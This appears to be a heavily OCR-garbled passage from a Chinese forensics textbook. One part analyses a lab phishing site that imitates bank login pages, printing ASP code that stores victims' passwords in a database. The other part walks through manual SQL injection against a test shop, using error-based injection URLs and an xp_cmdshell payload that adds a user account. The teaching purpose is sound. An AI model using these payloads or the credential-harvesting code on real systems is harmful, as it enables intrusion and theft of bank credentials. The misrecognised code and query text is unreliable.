单 提 交 ” 表 单 , 其 中 涉及 “汇款 银行 "选项 ,在 表单 内 输入 信息 ,点 击 “ 提 交 订 单 ” 按 钮 后 , 进 
入 “银行 支付 ”界面 如 图 3-10 所 示 。 

单 击 “ 工 商 银行 支付 "链接 后 ,可 见 “ 中 国 工商 银行 网 上 银行 ”仿冒 页 面 ,如 图 3-11 所 
示 。 其 页 面 内 容 及 风格 都 与 正规 的 “中 国 工商 银行 网 上 银行 "官方 网 站 相似 ,但 通过 URL 
地 址 “http://192. 168. 157. 128/servlet/gh. asp” 可 见 访问 的 不 是 官方 网 站 的 内 容 , 因 此 
该 网 页 为 一 个 “钓鱼 网 页 ”。 
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%。 支付 商户 : 在 线 发 件 

5 人 金额 : ¥1.00 

ie 本 订单 号 只 限 快递 网 

3%。 欢 迎 使 用 IPS 支 付 接口 ， 请 先 选择 银行 ， 热 后 选择 卡 种 和 地 区 


网 上 支付 , 实时 支付 , 实时 结算 
工商 狠 行 支付 民生 银行 支付 厂 发 银行 支付 建设 银行 支付 
招商 银行 支付 其 他 银行 支付 财富 通 支付 网 

招商 银行 网 上 支付 限额 500 元 ? 


因为 银行 系统 只 提供 汇款 金额 信息 , 银行 柜台 汇款 款项 的 归属 完全 由 人 工 识别 ,效率 较 低 ， 因 此 , 万 维 游 
戏 服 务 网 建议 您 尽 可 能 使 用 网 上 银行 进行 支付 。 


本 系统 所 有 数据 传输 均 使 用 128 位 SLL 安 全 性 加 密 


图 3-10 “银行 支付 ”页面 


正式 版 局 请 要 录 ”文件 人 E) 坦 看 (W) ”收藏 但 ) 


[ 国 http //192.168,157.128/seMet/oh.ap 加 区 
懂 中 心 A 京东 商城 二 360 人 2345 网 民 


百度 从 2345.co 于 多 特 软 件 “联想 Thi 国 至 诚 理财 > 


3) © + mr mnt 


图 返回 主页 国 全 业 同上 银行 


中 国 工商 银行 个 人 网 上 银行 金融 @ 家 一 


WOUSTRAL A COUNERCL BANK OF Comes 


日 全 人 网 上 银 2 ®@ > 


时 存折 版 登录 
请 给 入 注册 卡号 / 登 m: [| 加 
请 输入 登录 密码 : 和 a 同上 银行 自助 注册 


请 输入 右 便 显 示 的 验证 码 : G6s5.3] )65.8] 各 手机 银行 自助 注册 
和 自助 注册 国际 卡 密码 重 置 
i 的 《中 国 


银行 电子 根 行 章程 》。 修 使 用 网 上 良 行 ， 须 遵 守 本 

二 电 守 扣 和 二 户 信 四 pe 

并 知悉 《中 国 工商 银行 个 人 网 上 银行 交易 规则 》。 请 修 

点 击 “同意 ”, 进 入 全 融 8 家 个 人 同上 良 行 。 * 工行 论坛 
* 安全 提示 


mn Tm 


重要 提示 ;如果 您 是 第 一 次 在 本 计算 机 上 使 用 网 上 银行 ， 请 按照 系统 设置 指南 进行 必要 的 设置 


图 3-11 “中 国 工 商 银行 网 上 银行 ?钓鱼 页 面 


对 “银行 支付 ”页 面 中 的 链接 逐一 排查 后 . 共 找 到 如 下 7 个 钓鱼 模块 入 口 。 

。“ 中 国 工商 银行 网 上 银行 ”钓鱼 页 面 ,网 址 为 http://192. 168. 157. 128/servlet/ 
gh. asp; 

。“ 中 国民 生 银 行 网 上 支付 ”钓鱼 页 面 ,网 址 为 http://192. 168. 157. 128/servlet/ 


mszf. htm; 
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。“ 广 发 银行 网 上 支付 系统 ”钓鱼 页 面 ,网 址 为 http://192. 168. 157. 128/servlet/ 
ebank. htm; 

。“ 中 国 建设 银行 网 银 客户 支付 ”钓鱼 页 面 ,网 址 为 http://192. 168. 157. 128/ 
servlet/95533. asp; 

。“ 招 商 银行 一 卡通 支付 ”钓鱼 页 面 ,网 址 为 http://192. 168. 157. 128/servlet/ 

cmbbank. htm; 

“网 银 在 线 支 付 平台 ”钓鱼 页 面 ,网 址 为 http://192. 168. 157. 128/servlet/ 

WyZx. asp; 


。“ 腾 讯 财 付 通 ” 钓 鱼 页 面 ,网 址 为 http://192. 168. 157. 128/servlet/cft. asp。 


354 分 析 钓 鱼 模块 ,确定 数据 的 流转 路 径 


所 有 钓鱼 页 面 的 分 析 方 法 类 似 , 本 小 节 以 * 中 国 工商 银行 网 上 银行 ?钓鱼 模块 为 例 进 
行 分 析 。 

1. 数据 处 理 路 径 

首先 进入 http://192. 168. 157. 128/servlet/gh. asp 网 址 对 应 的 钓鱼 页 面 ,输入 “ 登 
录 ID”“ 登 录 密 码 ” 及 “验证 码 ” 后 , 单 击 “ 同 意 ” 按 钮 后 ,进入 “确认 支付 信息 ”页 面 ,其 网 址 
为 http://192. 168. 157. 128/servlet/zfmm. asp, 如 图 3-12 所 示 。 


式 版 篇 请 登录 “文件 (E) ”查看 (V) ”收藏 (8) 


=|| 国 http://192.168.157.128/servlet/zfmm.asp Y $ 加 可 


由 中 心 A 京东 商城、 改 360 2345 同 图 百度 从 2345.co 多 特 软件 “联想 Th 国 至 诚 理财 ” 


国 中 国 工商 银行 个 人 同上 银行 x 
中 国 I 商 银行 窜 户 订单 支付 服务 EW ) 
WOMAN 
确认 支付 信息 
商城 名 称 : 快 洒 单 和 | | 
交易 号 :SA9735446-D133Z66 | | 
辽 | 工行 zc 在 线 妇 付 系统 采用 目前 国 | 
金额 : 1.00 元 际 网 加 密 方式 进行 数据 。 | 
支付 下 导 : trittrrrrrntttttr 加 密 ， 为 多 提供 方便 、 灵 活 、 
匠 | 购物 介 寺 返 径 。 工行 个 人 网 上 良 行 客 | 
| 入 下， 再 和 订户 丰 在 人 加 
3: [seoeee 工行 上 进行 购物 付款 | 
请 输入 右 侧 | 及 生肉 从 四 册 放 居 和 在 和 | 
| | 
i ser" SE | 购物 付款 。 | 


图 3-12 “确认 支付 信息 "页面 


在 输入 框 中 ,输入 “交易 密码 ”及 “验证 码 ” 后 , 单 击 “ 提 交 ” 按 钮 ,进入 “失败 描述 信息 ” 
页 面 如 图 3-13 所 示 。 
在 整个 测试 过 程 中 ,用 户 共 输入 了 “登录 ID”、“ 登 录 密 码 ”“ 交 易 密码 ”三 个 敏感 信 
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民 乒 局 请 登录 文件 E) 查看 (Y) 收 世 (B) 


攻 = | | 国 http//192.168.157.128 


中 心 京东 商城 号 360 人 2345 网 


器 中 国 工商 银行 新 一 代 网 上 银行 贡 j 国 中 国 工商 银行 个 人 网 上 急行 
时 中 工 商 银行 客户 订单 支付 服务 
CT 
) 失败 描述 信息 
信息 代码 : 31365 


提示 信息 : 口令 卡 密码 不 正确 或 输入 超时 ， 请 返回 重新 输入 。 


请 与 我 们 联系 mailto-webmaster@icbc com.cn 中 国 工商 银行 版 权 所 有 


图 3-13 “失败 描述 信息 "页面 


息 ,从 客户 端 浏 览 器 地 址 栏 里 的 URL 信息 来 看 ,数据 流 经 了 网 站 主 目录 下 servlet 子 文件 
夹 里 面 的 gh. asp、zfmm. asp、servlet. asp 三 个 文件 。 


2. 数据 处 理 代码 

在 网 站 服务 器 里 面 定位 到 以 上 这 些 数 据 流 经 的 页 面 文件 ,查看 源 代码 进行 分 析 。 

(1) servlet/gh. asp 文件 仿冒 官方 网 站 让 用 户 输入 “登录 ID”“ 登 录 密 码 ”, 其 对 应 的 
源 代码 为 图 3-14 所 示 。 


sp 
FT 编辑 下 ) 格式 由 查看 YY 帮助 了 0) 
《FORM name=payform onSubnit="return check();”_action=zfmm.asp nethod=post> 
<TBODY> 
<TR> 
《TD width="48%" height=18></TD> 
《TD width="52%"></TD> C/TR> 
<TR> 


<TD height=25> 请 输入 注册 卡号 /登录 1D: /TD> 


了 &nbsp;<INPUT nane=kh id=""kh’ style="WIDTH: 148px"></TD>C/TR> 


vs colSpan=2 height=6></TD></TR> 


Sd height=25> 请 输入 登录 密码 ，<INPUT type=hidden 
nane=stime><INPUT type=hidden value=29 nane=tradenon></TD> 


<TD>&nbsp ;nbsp;CINPUT style=""WIDTH: 149px” type=password nane=logonCardPass></TD></TR> 
<TR> 


图 3-14 ”servlet/gh. asp 文件 代码 解析 


(2) servlet/zfmm. asp 文件 用 来 保存 “登录 ID” 和 “登录 密码 "信息, 并且 显示 表单 让 
用 户 输入 “交易 密码 ”, 其 对 应 的 源 代码 如 图 3-15 所 示 。 

(3) 在 servlet/servlet. asp 页 面 中 保存 “支付 密码 ”信息 ,其 对 应 的 源 代码 如 图 3-16 
所 示 。 
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角 zfan. asp - 记事 本 辐 回避 | 
文件 中 妨 辑 名 格式 @) 查看 WW 帮助 四 


《SB Language=UBScripts> 
< 


kh = Request-FformC"kh") 
LogonCardPass = Request.form("logonCardpass") 


Set con = Server.Create0bject("“ADODB.Connection") 

Set rs = Server.CreateObject(“ADODB.Recordset") 

con.open = “provider=nicrosoft.jet.oledb.4.8;" & "data source = " & server.nappath("data.ndb") 
sql="select * From a” 人 
rs-0pen sql, con,1,3 


eh”) 
rs("1oqonCardpass")=-10gonCardPass 
rs.Update 

%> 


< 


弗 zfan. asp - 记事 本 
文件 人 编辑 他) 格式 人 0) 查看 帮助 加) 


form action="Servlet .asp” method="post" nane="payform" onSubmit="return check();"> 
<Ery<Ed heTont="600" vaTign="top"> 


a. Pp 
<table width="188%" border="8" cellpadding="8" cellspacing="8" align="center")| 
<tr> 


《td > 支付 卡号 ，</td> 


《td>&nbsp ;多 nbSp ;ram 区/ 七 d》 


《td colspan="2”height="19"> 《FONT size=2><IMG height=23 src="2-bmp” 
width=199></FONT></td> 


height="1@"></td></tr> 
《td > 交易 密码 ，《/td> 


《td>&nbsp3 
Style="width:75;height:21;3"></td></tr> 


验证 码 ，</td><td ualign="top'">&nbsp;i&nbsp;i<input type="text" name="ueril 
ing border="B” src="https://nybank.icbc.con.cn/icbc/perbank/verifyinage 癌 
> 


图 3-15 servlet/zfmm. asp 文件 代码 解析 


文件 四 编辑 人 E) 格式 Q)】 查看 Q 帮助 人 D 
《8B Language=VBScript%> 
< 和 


zfje = Request-formg"kdje") 


Zfmm -Request- zf nm” 
Set Con = Server.CreateObject("“ADODB.Connection") 

Set rs = Server.CreateQbject("“ADODB.Recordset") 

con.open = "provider=microsoft.jet.oledb.4.0;" & “data source = "和 server.nappath("data.ndb") 
sql="select * fron a” ee 


rs.0pen sql, con,1,3 


> 
<HTML><HEAD><TITLE> 中 国 工商 银行 个 人 网 上 银行 </TITLE> 
< 


图 3-16 ”servlet/servlet. asp 文件 代码 解析 


3. 数据 最 终 保存 位 置 
通过 以 上 对 servlet 文件 夹 下 的 zfmm. asp、servlet. asp 文件 的 解析 过 程 可 知 , 网 站 获 


取 到 月 


日 户 输入 的 敏感 信息 后 ,将 其 存储 到 servlet 文件 夹 下 的 名 为 data. mdb 的 Access 数 


据 库 文件 中 的 数据 表 a 内 ,用 户 输入 的 “登录 ID” 保 存在 kh 字段 中 ;用 户 输 入 的 “登录 密 
码 ” 保 存在 logonCardPass 字段 中 ;用 户 输 入 的 “支付 密码 ”保存 在 zfmm 字段 中 。 

数据 表 a 内 容 如 图 3-17 所 示 。 

其 他 钓鱼 模块 的 分 析 方 法 同 “ 中 国 银行 网 上 银行 ”模块 类 似 .这 里 不 再 一 一 详 述 。 
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ding85286900 | dingB5186874 ¥0.00 
840317 
.00 
B5186874 
¥0.00 
840317 
¥0.00 
85186874 
Pw 到 
记录 : 4 2677 上 | |*#| 共有 记录 数 : 2719 KJ| 上 


图 3-17 数据 表 “a” 内 容 


355 钓鱼 网 站 分 析 方 法 


通过 对 “成 网 快递 ”钓鱼 网 站 的 分 析 , 总 结 出 钓鱼 网 站 的 常见 分 析 方 法 : 

(1) 通过 域名 查看 可 疑 网 站 的 备案 信息 , 若 没 有 或 不 完整 ,可 确定 为 重点 调查 对 象 ， 
正规 网 站 一 般 具备 详细 的 备案 信息 。 

(2) 对 所 调查 网 站 的 每 个 页 面 进行 逐一 检查 ,确定 钓鱼 页 面 。 对 含有 要 求 输入 敏感 
信息 的 页 面 进行 测试 ,特别 是 对 内 容 及 风格 都 与 银行 .淘宝 等 知名 电子 商务 官方 网 站 一 致 
的 页 面 ,输入 数据 后 ,所 提交 的 地 址 并 不 是 其 官方 网 站 对 应 的 地 址 ,这 样 的 页 面 可 确定 为 
钓鱼 页 面 。 

(3) 从 钓鱼 页 面 人 手 , 通 过 文件 名 或 页 面 内 的 一 些 关 键 信息 在 网 站 后 台 服 务 器 内 查 
看 钓鱼 页 面 源 代码 ,找到 输入 敏感 信息 所 对 应 的 FORM 表单 ,查看 FORM 中 action 属性 
值 ,及 敏感 信息 输入 框 input 中 的 name 属性 值 。 

(4) 通过 FORM 中 action 属性 值 标明 数据 提交 后 的 后 续 处 理 页 面 文件 ,在 该 文件 源 
代码 内 搜索 敏感 信息 输入 框 input 中 的 name 值 , 就 能 够 定位 到 钓鱼 代码 ,分 析 代 码 确定 
信息 穷 取 渠 道 ,比如 保存 到 数据 库 特 定 表 中 ;直接 通过 邮件 发 送 到 指定 邮箱 中 ;或 发 送 到 
指定 的 FTP 或 QQ 空间 中 ;也 可 直接 保存 到 服务 器 文件 中 等 ,并 通过 关键 字 找 到 所 窃取 
信息 的 具体 存放 地 址 。 


习 题 3 


1. 选择 题 (多 选 题 ) 
(1) 一 个 钓鱼 网 站 通常 由 以 下 ( ) 组 成 。 

A. 钓鱼 页 面 。 B. 后 台 处 理 模 块 ”C. 发 布 钓鱼 网 站 D. 信息 加 密 模块 
(2) 钓鱼 网 站 通常 将 获取 的 信息 通过 ( ) 方 式 进行 转移 。 

A. 保存 到 特定 文件 B. 保存 到 数据 库 

C. 发 送 到 聊天 室 D. 发 送 邮 件 
(3) 通常 来 说 ,“ 钓 鱼 页 面 "主要 具有 ( ) 特 征 。 

A. 涉及 让 用 户 输入 敏感 数据 
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B. 域名 与 被 仿冒 官方 页 面 域名 极其 相似 
C. 与 某 知名 网 站 在 内 容 等 方面 极其 相似 
D. 具有 输入 框 
(4) 钓鱼 页 面 中 通常 含有 ( )HTML 标签 。 
A. Form B. input C. request 


2. 问答 题 

(1) 什么 是 钓鱼 网 站 ? 

(2) 请 查阅 相关 资料 ,阐述 目前 钓鱼 网 站 的 犯罪 现状 。 
(3) 说 明 钓 鱼网 站 的 工作 流程 。 


(4) 请 查阅 相关 资料 ,阐述 目前 钓鱼 网 站 常用 的 推广 手段 。 


(5) 列举 常用 的 网 站 钓鱼 管道 及 它们 的 特点 。 
(6) 请 总 结 钓鱼 网 站 的 分 析 方 法 。 
(7) 如 何 防 范 网 络 钓 鱼 ? 


D. link 
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SQL 注 和 人 攻击 的 痕迹 
分 析 


第 了 划 


4.1 ”SQL 注入 的 成 因 分 析 


SQL 注入 漏洞 是 由 于 开发 网 站 的 技术 人 员 缺 乏 足 够 的 网 络 安全 意识 ,未 对 用 户 提交 
的 参数 进行 严格 的 检查 ,就 将 参数 直接 提交 给 后 台 的 数据 库 运行 ,这 些 参数 里 面 可 能 包含 
黑客 提交 的 恶意 指令 ,通过 在 被 人 侵 网 站 上 执行 这 些 指令 ,黑客 可 以 达到 完全 控制 网 站 的 
目的 。 

例如 , 某 个 电子 商务 网 站 的 lookpro. asp 文件 中 存在 这 条 数据 库 查 询 语句 : 


select * from shangpin where jd “&request("id)& 

这 条 语句 未 对 客户 提交 的 id 参数 内 容 进行 检查 就 直接 将 这 个 参数 送 到 数据 库 中 进 
行 查询 ,从 而 导致 了 注入 漏洞 的 发 生 。 攻 击 者 可 以 利用 该 漏洞 入 侵 服务 器 。 他 可 以 在 自 
己 主机 的 IE 地 址 栏 中 输入 下 面 语句 ， 

http://192 168. 0 3/lookpro. asp? id= 50:exec master. . xp_cmdshel| “net user aaa bbb /add”;-— 

服务 器 会 将 id 一 后 面 的 字符 串 当 作 参数 直接 送 到 查询 语句 中 ,查询 语句 会 变 为 下 
形式 : 


王 


select * from shangpin where id= 50;exec master..xp_cmdshel| “net user aaa bbb /add:-- 

注意 :“;” 是 分 隔 符 “--” 是 注释 符 、 其 后 的 内 容 为 注释 部 分 。 

这 样 一 来 在 数据 库 中 实际 运行 了 两 条 语句 .第 一 条 是 正常 的 select 查询 语句 ,第 二 条 
是 调用 xp_cmdshell 存储 过 程 在 服务 器 端 建立 一 个 用 户 名 为 aaa、 密 码 为 bbb 的 新 账户 。 
最 后 的 “;--” 可 以 保证 语句 正常 结束 。 
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”机 扫描 注入 点 .判断 数据 库 类 型 .用 户 权限 、 
数据 库 名 和 用 户 表 内 容 


421 实验 环境 


以 host-only 方式 启动 Windows XP 虚拟 机 ,IP 地 址 配置 为 192. 168.0.3。 在 XP 虚 
拟 机 上 安装 电子 商务 网 站 shop, 网 站 后 台 使 用 SQL Server 2000 数据 库 ,前 台 为 一 组 
ASP 脚本 ,如 图 4-1 所 示 。 


Bm 
[a3t: 全] \ ri 
[e221?] 号 【查看 匠 自 ] 
[中 《了 向 2 
er] iT 

) 推荐 
) > 四 人 

有 :5 和 
IAS: €] 【会 册 轴 :10] 
[RA 【二 和 ] 
和] [9] 


图 4-1 浏览 shop 网 站 的 结果 


422 实验 目的 介绍 


该 网 站 的 数据 库 组 成 如 图 4-2 所 示 。 在 admin 表 中 保存 了 网 站 管理 员 的 账户 信息 ， 
其 中 username 字段 保存 用 户 名 、pass 字段 保存 经 过 MD5 加 密 的 密码 ,可 见 admin 表 中 
保存 了 4 个 用 户 : mr、user、jack、lll。 如 果 能 获得 这 些 账户 信息 ,那么 就 能 以 管理 员 的 身 
份 登录 到 网 站 的 管理 后 台 ,进而 通过 管理 功能 修改 网 站 的 主页 文件 index. asp, 实 现 网 页 
挂 马 。 因 此 ,本 次 实验 的 目的 是 获取 到 admin 表 中 的 账户 信息 。 为 了 完成 实验 目的 ,要 
依次 获得 以 下 信息 : 注入 点 位 置 .数据 库 的 类 型 .当前 用 户 名 、 当 前 数据 库 名 、 表 名 .字段 
名 ,字段 值 。 下 面 以 手工 注入 的 方式 介绍 具体 的 攻击 过 程 。 


423 以 手工 注入 的 方式 进行 攻击 


1. 判断 注入 点 类 型 及 当前 用 户 名 
通过 URL 地 址 栏 提 交 给 服务 器 的 参数 主要 有 两 种 类 型 : 整数 型 和 字符 型 。 首 先 判 
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图 4-2 shop 数据 库 的 构成 


和 i SQL Server Enterprise Hanager - [ 表 “adain” 中 的 数据 ， 位 置 是 “shop” 中 、*“(... 夺 | 厨 | 


窗 文件 四 窗口 如 帮助 0 


办 | 王 看 亚 加 | 户 ! 收 凡 外 让 尺 医 蝗 


10 12344#@123. com = lym 12344## 


vip 
nr d7b0a5gbada06adl 0 
user e411e2d89e7c073 0 11 123+ky@123. com 111 1345wyy 
jack T7457a5a743894aDe 0 17 adnin8163. com 。 jack 86982480 
11 9dBal21ce581499d 0 13 mnt##@163. com 。 123 0431-6541| 
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图 4-3 ”admin 表 的 内 容 


断 动 态 链 接 是 否 为 字符 型 注入 点 ,在 IE 地 址 栏 输入 http://192. 168. 0. 3/lookpro. asp? 
id 二 53' and "二 '"。 如 果 是 字符 型 注入 点 ,服务 器 端 执行 的 SQL 语句 格式 为 select 字段 
from 表 名 where id 一 53' and "一 ", 页 面 会 正常 显示 。 如 果 页 面 不 能 正常 显示 , 则 继续 判 
断 是 否 为 数值 型 注入 点 ,在 IE 地址 栏 输入 http://192. 168. 0. 3/lookpro. asp? id 一 53 
and 1 二 1, 如 果 是 数值 型 注入 点 ,服务 器 端 执行 的 SQL 语句 格式 为 "select 字段 from 表 名 
where id 一 53 and 1 二 1" ,页 面 会 正常 显示 。 经 过 测试 本 例 为 数值 型 注入 点 。 


2. 判断 数据 库 类 型 .用户 权限 和 数据 库 名 
Sysobjects 是 SQL Server 数据 库 中 保存 所 有 对 象 信息 的 一 个 系统 表 ,msysobjects 
是 Access 数据 库 中 保存 对 象 信息 的 数据 表 , 相 应 地 其 他 数据 库 也 有 自己 的 系统 表 。 通 过 
判断 服务 器 上 是 否 存在 特定 的 系统 表 , 即 可 确定 数据 库 软 件 的 类 型 。 例 如 测试 目标 服务 
器 上 是 否 使 用 了 SQL Server 数据 库 , 可 以 使 用 如 下 语句 : 
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http://192 168. 0.3/ looknews. asp? id= 20% 20% 20and’é 20exists% 20 (select% 20* 
% 20front 20sysobjects)% 20- 一 
服务 器 端 执行 的 SQL 语句 格式 为 
select 字段 from 表 名 where id= 20 and exists (select * from sysobjects)- 一 


如 果 页 面 返回 正常 ,说 明 是 SQL Server 数据 库 ;否则 ,继续 判断 是 否 是 其 他 类 型 数据 
库 。 本 例 使 用 的 是 SQL Server 数据 库 。 
接 下 来 判断 当前 用 户 名 。 字 符 型 注入 点 的 判断 语句 : 


http://192. 168. 0. 3/1ookpro. asp? id= 53' % 20and% 20char (129% 2Buser% 2Bchar (124= 
0% 20and% 20 "=" 


服务 器 端 执行 的 SQL 语句 格式 为 
select 字段 from 表 名 where id='53 and |+ user+ |=0and =" 
整数 型 注入 点 的 判断 方法 : 
http://192. 168. 0. 3/1ookpro. asp? id 53% 20and% 20char (124)% 2Buser% 2Bchar (1240)= 0 
在 服务 器 端 执 行 的 SQL 语句 格式 为 
select 字段 from 表 名 where id= 53 and |+ user+ |=0 
系统 变量 user 中 保存 的 是 字符 类 型 的 当前 用 户 名 ,将 这 个 字段 转换 为 整数 时 出 错 ， 
在 服务 器 返回 的 错误 提示 信息 中 会 包含 当前 用 户 名 。 从 图 4-4 可 知 当 前 用 户 名 为 dbo。 
。 措 误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 rreher 值 “|dbe|” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 
J asp,， 第 51 行 


图 4-4 通过 服务 器 返回 结果 判断 当前 用 户 名 


用 户 权限 对 注入 攻击 效果 影响 很 大 ,因此 需要 探测 当前 用 户 在 服务 器 端的 权限 ,测试 
语句 如 下 : 
http://192 168. 0. 3/lookpro_asp? id= 53% 20And 20char (120)% 2BCast (IS_ 


SRVROLEMEMBER (0x730079007300610064006D0069006E00)% 20as% 20varchar (1))% 
2Bchar (120= 1 20- — 


在 服务 器 端 执行 的 SQL 语句 为 : 

select 字段 from 表 名 where id 53 And |+ Cast(IS_ 

SRVROLEMENBER (0x730079007300610064006D0069006E00) as varchar (1))+ |= 仁 一 

0x730079007300610064006D0069006E00 是 ' sysadmin ' 的 十 六 进 制 码 , IS _ 
SRVROLEMEMBER( ?sysadmin’) 函数 判 断 当 前 用 户 是 否 为 管理 员 角 色 的 成 员 , 返 回 值 


类 型 为 int,0 表示 不 是 成 员 ,1 表示 是 成 员 。Cast(int as varchar(1)) 将 整数 类 型 数据 转 
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换 为 字符 型 ,字符 型 数据 同 整数 1 进行 比较 时 出 现 类 型 不 一 致 错误 ,通过 服务 器 返回 的 结 
果 可 以 得 知 当前 用 户 的 权限 。 通 过 如 图 4-5 所 示 的 服务 器 返回 信息 可 知 , 当 前 用 户 为 管 
理 员 权限 。 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 varchar 值 “ |1| 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 烧 


人 履 。 
门 ookpro- asp， 第 51 行 
图 4-5 通过 服务 器 返回 结果 判断 当前 用 户 权限 
通过 db_name 函数 可 以 获得 当前 数据 库 的 名 称 ,通过 下 面 语句 测试 当前 数据 库 
名 称 : 
http://192. 168. 0. 3/1ookpro. asp? id 53% 20and 20char (129% 2Bdb_name 0% 2Bchar (120)= 0% 20- — 
在 服务 器 端 执行 的 SQL 语句 为 : 
select 字段 from 表 名 where id 53 and |+ db_name0+ |=0-- 
db_name() 函 数 返 回 当前 数据 库 名 称 , 在 将 字符 串 和 整数 0 比较 时 出 现 类 型 错误 , 通 
过 服务 器 的 返回 信息 可 以 获得 当前 数据 库 的 名 称 。 从 图 4-6 可 知 当 前 数据 库 名 为 shop。 
。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 “|shop|” 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 


错误 。 
f1ookpro. asp， 第 51 行 


图 4-6 通过 服务 器 的 返回 结果 获得 当前 数据 库 名称 


3. 从 sysdatabase 获得 数据 库 个 数 

在 SQL Server 数据 库 中 sysdatabases 系统 表 保 存 了 所 有 数据 库 的 信息 ,通过 下 面 语 
句 可 以 获得 数据 库 的 个 数 : 

http://192 168. 0.3/ looknews. asp? id= 20% 20and% 20 (Select% 20char (124)% 2BCast (Count (1) as varchar (8000))% 2Bchar 

(120% 20frants 20raster. . sysdatabases) > = 0:—— 

从 图 4-7 可 知 数据 库 共 7 个 。 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 varehar 值 “|7| 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 


dd, asp, 第 41 行 
图 4-7 获得 数据 库 个 数 
4 依次 获取 每 个 数据 库 名 称 
下 面 语句 可 以 获得 第 一 个 数据 库 的 名 称 为 master, 如 图 4-8。 查 询 语句 为 : 


http://192 168. 0. /1ooknews. asp? id 20 and (Select Top 1 cast (Iname] as 
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varchar (8000)) from(Select Top n dbid name from [master]..[sysdatabases] order 
by [dbid]) T order by [dbid] deso> 0;-— 


。 请 识 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 varchar 值 "naster” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 
寺 误 。 


人 1oolkners.asp, 第 41 行 


图 4-8 第 一 个 数据 库 名 为 master 


变换 子 查询 中 的 n 值 , 就 可 依次 得 到 每 个 数据 库 的 名 称 。 图 4-9 显示 第 二 个 数据 库 
名 为 tempdb。 查 询 语句 为 : 


http://192 168. 0. 3/1ooknews. asp? id= 20 and (Select Top 1 cast ([name] as 
varchar (8000)) from(Select Top 2 dbid, name from [master]..[sysdatabases] order 
by [dbid]) T order by [dbid] deso> 0;-— 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 varchar 值 “tempdb” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 
错误 。 
flookners.asp, 第 41 行 


图 4-9 第 二 个 数据 库 名 为 tempdb 
图 4-10 显示 第 七 个 数据 库 名 为 shop。 查 询 查 询 语 句 为 : 


http://192. 168. 0. /looknews. asp? id= 20 and (Select Top 1 cast (Iname] as 
varchar (8000)) from(Select Top 7 dbid, name from [master]..[sysdatabases] order 
by [dbid]) T order by [dbid] desc)> 0:-- 


。 错误 类 型 ; 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 varchar 值 “shop” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 
flookners.asp, 第 41 行 


图 4-10 第 七 个 数据 库 名 为 shop 


5. 获得 当前 对 象 个 数 

通过 下 面 语句 可 以 获得 对 象 个 数 : 

http://192. 168. 0. 3/1ooknews. asp? id 20% 20and% 20 (Select% 20char (1249% 2BCast (Count (1) as varchar (3000))% 2Bchar 
(124)% 20fronts 20[sysobjects])> = 0:-— 


图 4-11 显示 对 象 个 数 为 66。 
。 错误 类 型 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 varchar 值 ′|661 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 
门 eoknews- asp， 第 41 行 


图 4-11 对 象 个 数 为 66 
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6. 获得 当前 用 户 表 个 数 
下 面 语 句 可 获得 用 户 表 个 数 : 


http://192 168. 0 3/1ooknews. asp? id 20% 20and% 20 (Select% 20char (129% 2BCast (Count (1) as varchar (8000))% 2Bchar 
(124) % 20fronts 20[sysobjects] where xtype= 
0x55)>= 0:- 一 


图 4-12 显示 共 12 个 用 户 表 。 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 varchar 值 “|12| ”转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 
门 ooknews- asp， 第 41 行 


图 4-12 共 12 个 用 户 表 


7. 依次 获得 每 个 用 户 表 名 称 
下 面 语句 可 以 获得 第 一 个 用 户 表 的 名 称 : 


http://192. 168. 0. 3/1ooknews. asp? id= 20 And (Select Top 1 cast name as 
nvarchar (4000)) from (Select Top 1 id name from sysobjects Where xtype= 0x55 order 
by id) T order by id desc)> 0;-— 


图 4-13 显示 第 一 个 用 户 表 名 为 user。 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 “user” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 


flooknews- asp， 第 41 行 


图 4-13 第 一 个 用 户 表 名 为 user 


变换 下 面 语句 中 的 n 值 ,可 以 依次 获得 每 个 用 户 表 的 名 称 。 


http://192. 168. 0. 3/1ooknews. asp? id= 20 And (Select Top 1 cast name as 
nvarchar (4000)) from (Select Top n id,name from sysobjects Where xtype= 0x55 order 
by id) T order by id desc)> 0;-— 


图 4-14 是 依次 获得 每 个 用 户 表 的 名 称 。 
8. 猜测 admin 表 的 id 号 
下 面 语句 可 获得 admin 表 的 id 号 


http://192. 168. 0 3/1ooknews. asp? id= 20 And (Select Top 1 char (124)% 2Bcast (id as varchar (1000))% 2Bchar (124) 
from sysobjects where name= ' adnin )> 0:- 一 


图 4-15 显示 admin 表 的 id 号 为 565577053 。 
9. 猜测 admin 表 的 字段 名 称 
下 面 语句 可 以 获得 第 一 个 字段 名 称 : 
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. 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 nvarchar 值 “ bigclass， 转 换 为 数据 类 型 为 int 的 列 时 发 生 语 

法 错误 。 

flooknews.asp, 第 41 行 

错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (0x80040E07) 

将 nvarchar 值 “class” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语 法 
潜 误 。 

门 ooknews- asp， 第 41 行 


错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “adnin” 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 


门 ooknews- asp， 第 41 行 


错误 类 型 ; 

